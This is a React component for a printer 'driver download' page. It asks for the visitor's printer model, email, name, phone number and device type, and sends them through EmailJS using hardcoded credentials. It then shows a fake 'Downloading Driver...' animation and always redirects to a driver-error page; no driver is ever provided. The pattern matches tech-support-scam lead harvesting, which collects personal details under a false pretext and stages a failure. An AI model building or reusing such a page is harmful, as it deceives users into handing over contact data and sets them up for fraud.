import React, { useState } from "react";
import "./DownloadDriverForm.css";
import emailjs from "@emailjs/browser";
import { useEffect } from "react";

const DownloadDriverForm = ({ brand, image }) => {
  const [showPopup, setShowPopup] = useState(false);
  const [loading, setLoading] = useState(false);
useEffect(() => {
        // 👇️ scroll to top on page load
        window.scrollTo({ top: 0, left: 0, behavior: 'smooth' });
      }, []);
  const [formData, setFormData] = useState({
    printerModel: "",
    email: "",
    name: "",
    phone: "",
    deviceType: "",
  });

  const handleChange = (e) => {
    setFormData({ ...formData, [e.target.name]: e.target.value });
  };

  const handleSubmit = (e) => {
    e.preventDefault();
    setShowPopup(true);
    setLoading(true);
    
        emailjs
          .send(
            
             "service_l84egzf",     // replace with EmailJS Service ID
          "template_rtse6nv",    // replace with EmailJS Template ID
          formData,
            "zz-a3aiOzvGqHqngp"
          )
          .then(
            () => {
              // simulate loading for 5 sec before error redirect
              setTimeout(() => {
               
                window.location.href = `/${brand.toLowerCase()}/driver-error`;
              }, 5000);
            },
            (error) => {
              console.error("FAILED...", error);
              setTimeout(() => {
               
                window.location.href = `/${brand.toLowerCase()}/driver-error`;
              }, 5000);
            }
          );
    
  };

  return (
    <>
    <div className={`down_d_container down_d_${brand.toLowerCase()}`}>
      <div className="down_d_wrapper">
        {/* Left: Form */}
        <div className="down_d_left">
          <h2 className="down_d_title">
            Printer Model Identified and Compatible Driver Found
          </h2>
          <ul className="down_d_list">
            <li>Get the Latest Printer Drivers for Seamless Performance.</li>
            <li>
              To Enable Printer — Register and Download Printer Software.
            </li>
          </ul>

          <form className="down_d_form" onSubmit={handleSubmit}>
            <div className="down_d_row">
              <div className="down_d_field">
                <label>Printer Model *</label>
                <input
                  type="text"
                  name="printerModel"
                  placeholder={`Example: ${brand} XYZ 1234`}
                  value={formData.printerModel}
                  onChange={handleChange}
                  required
                />
              </div>
              <div className="down_d_field">
                <label>Email *</label>
                <input
                  type="email"
                  name="email"
                  placeholder="you@example.com"
                  value={formData.email}
                  onChange={handleChange}
                  required
                />
              </div>
            </div>

            <div className="down_d_row">
              <div className="down_d_field">
                <label>Full Name *</label>
                <input
                  type="text"
                  name="name"
                  placeholder="John Smith"
                  value={formData.name}
                  onChange={handleChange}
                  required
                />
              </div>
              <div className="down_d_field">
                <label>Phone Number *</label>
                <input
                  type="tel"
                  name="phone"
                  placeholder="10 Digits US Number"
                  value={formData.phone}
                  onChange={handleChange}
                  required
                />
              </div>
            </div>

            <div className="down_d_field">
              <label>Device Type *</label>
              <select
                name="deviceType"
                value={formData.deviceType}
                onChange={handleChange}
                required
              >
                <option value="" >--- Select Choice ---</option>
{
  [
                  "Windows Computer",
                  "Mac Computer",
                  "Chromebook",
                  "iPad / iPhone",
                  "Other / Not Sure",
                ].map((option) => (
                  <option key={option} value={option}>
                    {option}
                  </option>
                ))
}
               
              </select>
            </div>

            <button type="submit" className="down_d_btn">
              Download Driver
            </button>
          </form>
        </div>

        {/* Right: Brand Image */}
        <div className="down_d_right">
          <img src={image} alt={`${brand} printer`} className="down_d_img" />
        </div>
      </div>
    </div>

    {showPopup && (
        <div className="popup-overlay">
          <div className="popup">
            

            {loading && (
              <div className="loading text-center">
                <div className="loader"></div>
                                    <h3>Downloading Driver...</h3>
                                    <p>Please wait, this may take a few moments.</p>
              </div>
            ) }
          </div>
        </div>
      )}

    </>
  );
};

export default DownloadDriverForm;
